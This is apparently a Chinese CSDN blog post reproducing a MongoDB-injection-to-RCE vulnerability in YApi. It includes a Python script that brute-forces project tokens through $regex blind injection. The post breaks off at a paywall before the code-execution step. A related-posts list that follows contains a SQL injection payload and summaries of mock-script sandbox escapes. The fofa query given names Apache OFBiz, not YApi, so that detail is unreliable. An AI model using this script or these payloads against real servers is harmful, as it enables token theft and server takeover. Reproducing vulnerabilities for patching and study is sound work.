YApi Mongo注入导致RCE漏洞复现

已于 2024-02-01 18:33:45 修改
阅读量1k 收藏 12
点赞数 16
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: yapi 漏洞复现 RCE漏洞 安全漏洞
于 2024-01-31 15:35:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135677054
本文详细介绍了YApi平台中的MongoDB注入漏洞,导致远程代码执行(RCE)的风险。通过盲注获取token,上传攻击脚本到pre-response,并利用自动化测试接口触发脚本执行,揭示了漏洞复现的完整过程。同时提供了Python实现脚本,帮助理解漏洞原理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。Api 由于 base.js 没有正确对 token 参数进行正确过滤,导致存在远程代码执行漏洞。

1.漏洞级别

高危

2.漏洞搜索

fofa

app="Apache_OFBiz"

3.影响范围

YApi < 1.12.0

4.漏洞复现

漏洞复现需要经历三个步骤

  • 通过接口注入获取token
  • 上传攻击脚本到 pre-response
  • 调用自动化测试接口触发攻击脚本
    下面会按照步骤逐步操作。

4.1 获取token

接口存在mongo注入漏洞,我们可以通过盲注的方式来获取有效token。
构造post请求

url/api/interface/up
            data = {
                'id' : -1,
                'token' : {
                    '$regex': guess,
                    '$nin': []
                }
            }
            headers = {
                'Content-Type': 'application/json'
            }
  • token长度为20
  • 数据库中的token为16进制存储,所以token每个字符的可能的值有’abcedf0123456789’
  • 我们可用正则匹配的方式来爆破token
  • 传入的参数token中的regex需要已^为前缀,这是一个正则表达式的写法

匹配正确的情况下会返回400
在这里插入图片描述
匹配错误则会返回40011
在这里插入图片描述
这里提供一个我实现的简单爆破脚本

import requests,json

choices = 'abcedf0123456789'

def get_token(url,already):
    current = "^"
    for i in range(20):
        for ch in choices:
            guess = current + ch
            data = {
   
   
                'id' : -1,
                'token' : {
   
   
                    '$regex': guess,
                    '$nin': []
                }
            }
            headers = {
   
   
                'Content-Type': 'application/json'
            }
            resp = requests.post(url+"/api/interface/up", data = json.dumps(data), headers=headers)
            res = resp.json()
            if res['errcode'] == 400:
                current =guess
                break
        print("正确的token为:" + current)

    return current[
最低0.47元/天 解锁文章

新学期VIP享超值加赠
漏洞复现Yapi接口管理平台RCE漏洞汇总
李同學的安全圈
01-10 7530
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
YApi分析从NoSQL注入RCE远程命令执行.md
god_Zeo的安全博客
03-05 3218
YApi是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台。YApi 是高效易用功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
yapi token注入漏洞
whoami
11-21 2651
YApi 是一个可本地部署的可视化的接口管理平台。YApi 在 1.11.0 之前的版本中存在远程代码执行漏洞,因为 base.js 没有正确对 token 参数进行正确过滤,攻击者可通过 MongoDB 注入获取用户 token(包括用户 ID、项目 ID 等),进而使用自动化测试 API 接口写入待命命令,利用沙箱逃逸触发命令执行。
Yapi RCE 复现和批量编写
y0un9er
07-11 1065
复现yapi漏洞的利用方式,并完成脚本编写
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 896
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
Yapi接口管理平台RCE漏洞
m0_65150886的博客
01-31 581
的、可视化的接口管理平台。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。5.点击高级Mock,选择脚本,添加代码,选择开启,并进行保存。1.访问http://ip:port,出现如下页面,开始实验。2、使用Nginx对Yapi进行反向代理。YApi是一个可本地部署的、打通前后端及。5、关闭Yapi Mock。1、更改Yapi运行端口。密码:ymfe.org。4、关闭Yapi注册。
yapi mongo注入测试脚本
02-01
python实现的yapi mongo注入复现脚本,通过该脚本可以有效测试。
YAPI远程执行漏洞复现
weixin_46580614的博客
08-02 457
YAPI远程执行漏洞复现 实验靶机 BUUCTF :题目 ezrce 漏洞详情 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令
YAPI开源接口管理平台远程代码执行漏洞复现
我是小小白的博客
07-09 509
YAPI开源接口管理平台远程代码执行漏洞复现 前言 该漏洞环境为本地搭建,本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任! 漏洞详情 YAPI接口管理平台是国内某旅行网站的开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 该漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,攻击者
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 1126
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
漏洞复现----34、yapi 远程命令执行漏洞
七天
06-24 1908
Yapi远程命令执行漏洞
MongoDB库中存在多个漏洞,可用于在Node.js服务器上实现RCE
最新发布
smellycat000的专栏
02-24 650
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全平台 OPSWAT报道称,MongoDB的库 Mongoose Object Data Modeling (ODM) 中存在两个严重漏洞,可导致攻击者在 Node.js 应用服务器尚实现远程代码执行 (RCE)。Mongoose 库广泛部署于生产环境中,可将 JavaScript 对象映射到 MongoDB 文档中,使数据管理和验证更加容...
yapi RCE漏洞复现
尐猴子君ii的博客
08-23 1976
前段时间,公司打内部的攻防比赛,然后手里的工作比较忙,时间也比较短,于是就没怎么打。发现了一台主机3000端口开了yapi服务,且能在前台执行命令,但是就是弹不回来shell。有门进不去的感觉就很烦,心痒痒的就想在赛后复盘一下。于是就有这篇文章。 贵有恒,何必三更起五更睡;最无益,只怕一日曝十寒。话不多说,搞快点。 首先面向fofa搜索yapi的资产 找到了个54.xxx的IP,就你了皮卡丘 首先进去,发现注册账户功能是开放的,冲 登录 创建项目 添加接口 执行payload con
mongodb – SSJI to RCE
cnbird's blog
03-27 1218
Lucky discovery Trying some server side javascript injection in mongodb, I wondered if it would be possible to pop a shell. The run method seems good for this : > run("uname","-a") Sun Mar 24 07:
YAPI接口管理平台RCE复现-附exp
三天不打上房揭瓦的博客
07-12 2163
目录漏洞简介影响版本漏洞复现手工验证EXP验证漏洞防御 漏洞简介 YAPI是由去哪儿网移动架构组开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。 漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本的命令过滤,用户可以添加任何请求处理脚本,攻击者可利用该漏洞在受影响的服务器上执行任意JS代码。 影响版本 YAPI全版本 漏洞复现 手工验证 1、注册账号 2、登录后新建项目 3、设置全局mock脚本及接口 JS代码如下: const s
YAPI接口管理平台RCE漏洞排查
dayouzi的博客
08-14 1042
Yapi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。攻击者通过注册用户,并使用 Mock 功能实现远程命令执行。命令执行的原理是 Node.js 通过 require(‘vm’) 来构建沙箱环境,而攻击者可以通过原型链改变沙箱环境运行的上下文,从而达到沙箱逃逸的效果。
Mongo-Express RCE(CVE-2019-10758)复现排查
dayouzi的博客
08-14 1410
Mongo-express是的管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
渗透测试之地基服务篇:服务攻防之数据库Mongodb(下)
xnxqwzy的博客
07-31 430
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
漏洞复现YApi接口管理平台远程代码执行
白帽子九一
05-31 1239
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值